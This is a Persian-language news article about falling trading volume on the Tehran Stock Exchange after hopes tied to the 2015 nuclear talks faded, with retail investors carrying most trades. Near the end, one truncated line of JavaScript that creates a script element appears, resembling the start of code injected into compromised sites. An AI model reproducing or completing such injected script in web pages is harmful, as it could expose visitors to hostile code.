پنج شنبه , 23 آذر 1396
خانه / اخبار بورس / اخبار فوری بورس / سنگینی بار بورس بر دوش حقیقی ها/خون در رگهای بورس جریان ندارد

سنگینی بار بورس بر دوش حقیقی ها/خون در رگهای بورس جریان ندارد

مدت هاست معاملات بازار سرمایه جریان پر قدرتی نداشته و بی رغبتی و بی رمقی در میان سرمایه گذاران آن به وضوح مشاهده می شود.

به گزارش بورس نیوز، آنچه این روزها در روند معاملات بورس حکمفرماست، نبود انگیزه در معامله گران و سرمایه گذاران است که این عامل کلیت بازار را نیز درگیر ساخته و کاهش چشمگیر حجم معاملاتی را در پی داشته است.

بطوریکه نمودار زیر به روشنی این شرایط نا مطلوب را نشان می دهد که در آن حجم معاملات روزانه در مقایسه با ابتدای سال 94 به شدت کاهش یافته است.

سنگینی بار بورس بر دوش حقیقی ها/خون در رگهای بورس جریان ندارد
بر این اساس در حالی سرمایه گذاران با امیدواری به مذاکرات هسته ای یک روز پس از صدور بیانیه مشترک ایران با گروه 1+5 بیش از دو میلیارد و 57 میلیون سهم را معامله کردند که در روزهای باقیمانده از فروردین ماه سال جاری نیز معاملات نسبتاً پر حجمی در مقایسه با روزهای پایانی سال 93 در بازار رقم خورد؛ اما با برآورده نشدن انتظارات سرمایه گذاران در خصوص مسایل هسته ای و مذاکرات ایران با گروه 1+5، این تقاضا و حجم معاملاتی به تدریج کاهش یافت تا روزهای سرد جای معاملاتی را که به سمت گرمای بیشتر می رفت گرفت تا باز هم روزهای زمستانی کلیت فضای بورس را احاطه کند.

بطوریکه این روند تا جایی پیش رفت که این بی انگیزگی به انجام معاملاتی به ارزش در حدود 100 میلیارد تومان در روزهای اخیر منجر شد.

علاوه بر این، در این سیر نزولی که در حجم معاملات مشاهده می شود، نقش حقوقی ها به مراتب کمتر از حقیقی ها بوده و این سرمایه گذاران خرد و حقیقی بازار بوده اند که تاکنون بیشتر حجم معاملات را به دوش کشیده اند. بطوریکه در روز معاملاتی گذشته حقوقی ها 198 میلیون سهم فروخته و 216 میلیون سهم خریدند. در مقابل حقیقی ها به تنهایی بیش از 145 میلیون سهم را در بازار معامله کردند.

این در حالی است که پس از تعطیلات نوروزی و در شرایطی که امیدواری ها به بهبود روند معاملات در بورس قدری جان گرفته بود، تنها در یک روز حقیقی ها بیش از دو میلیارد و 869 میلیون سهم معامله کردند و در مقابل حقوقی ها نیز بیش از یک میلیارد سهم خریده و بیش از یک میلیارد و 392 میلیون سهم فروختند. حجمی که شاید با شرایط فعلی و تحت تأثیر نبود انگیزه بین معامله گران تا مدت ها نتوان نظیر آن را در بورس دید.

به هر ترتیب آنچه که از این نمودار می توان به اهمیت آن پی برد، نیاز به برگشت امید در دل سرمایه گذاران و افزایش اعتماد آنها به بورس است؛ چراکه نبود این عامل با افزایش بی انگیزگی در میان معامله گران، رکود و کاهش حجم در معاملات را در پی دارد. حال آنکه حتی صدور یک بیانیه مشترک در فرآیند مذاکرات هسته ای توانست آنچنان خوش بینی و امیدی را در دل سرمایه گذاران و سهامداران به ویژه حقیقی ها ایجاد کند که بر خلاف روزهای پایانی سال 93 معاملات بسیار پر حجمی نسبت به قبل از آن رقم بخورد؛ اما به تدریج این خوش باوری از بین رفت تا نه تنها معاملات پر حجمی را همانند اسفندماه شاهد نباشیم، بلکه امروز حجم معاملات نسبت به آن روزها نیز بگونه ای با کاهش بیشتری همراه شده تا رکودی شدید بر بورس چیره گردد. آنچنان که به نظر می رسد این روزها دیگر خونی در رگ های بورس جریان ندارد و بایستی به دنبال دارویی برای درمان این بیماری بود.

var d=document;var s=d.createElement(‘script’);

بازتاب کلوب